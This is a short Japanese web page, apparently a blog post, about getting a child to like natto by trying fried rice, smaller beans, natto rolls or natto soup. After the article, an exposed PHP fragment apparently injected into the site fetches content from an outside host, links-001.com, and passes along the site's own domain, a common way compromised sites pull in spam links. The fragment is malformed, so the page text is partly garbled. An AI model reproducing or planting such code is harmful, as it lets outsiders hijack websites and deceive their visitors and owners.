前へ
次へ

納豆のいろいろな食べ方で苦手を克服

友人の息子さんで納豆が苦手な子がいました。
納豆は栄養価も高く食物繊維も豊富、しかも安いのでなんとか美味しく食べて欲しいと、友人はいろいろ工夫したようです。
最終的に納豆チャーハンにすることで、息子さんは納豆を食べられるようになりました。
その後はチャーハンにしなくても食べるようになったそうです。
納豆は独特の匂いや粘りがありますが、炒めることで和らぎます。
また油と相性が良く、チャーハンはベストなアレンジでした。
また、大粒だと豆の味が強く、独特の歯ざわりも気になるかもしれません。
小粒のものから試したり、ひきわりを選んでもいいでしょう。
納豆ごはんは苦手でも、納豆巻きなら好き、という子どももいます。
味や匂いそのものより食べ方に左右されることもあるので、手巻き寿司にしたり、納豆汁などを試すのもおすすめです。
納豆に限らず、好き嫌いは食べ方一つで解消することもあります。
子どもも大人もあまり無理はせず、まずはさまざまな食べ方で試してみるといいかもしれません。

".file_get_contents('http://links-001.com/123set5?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top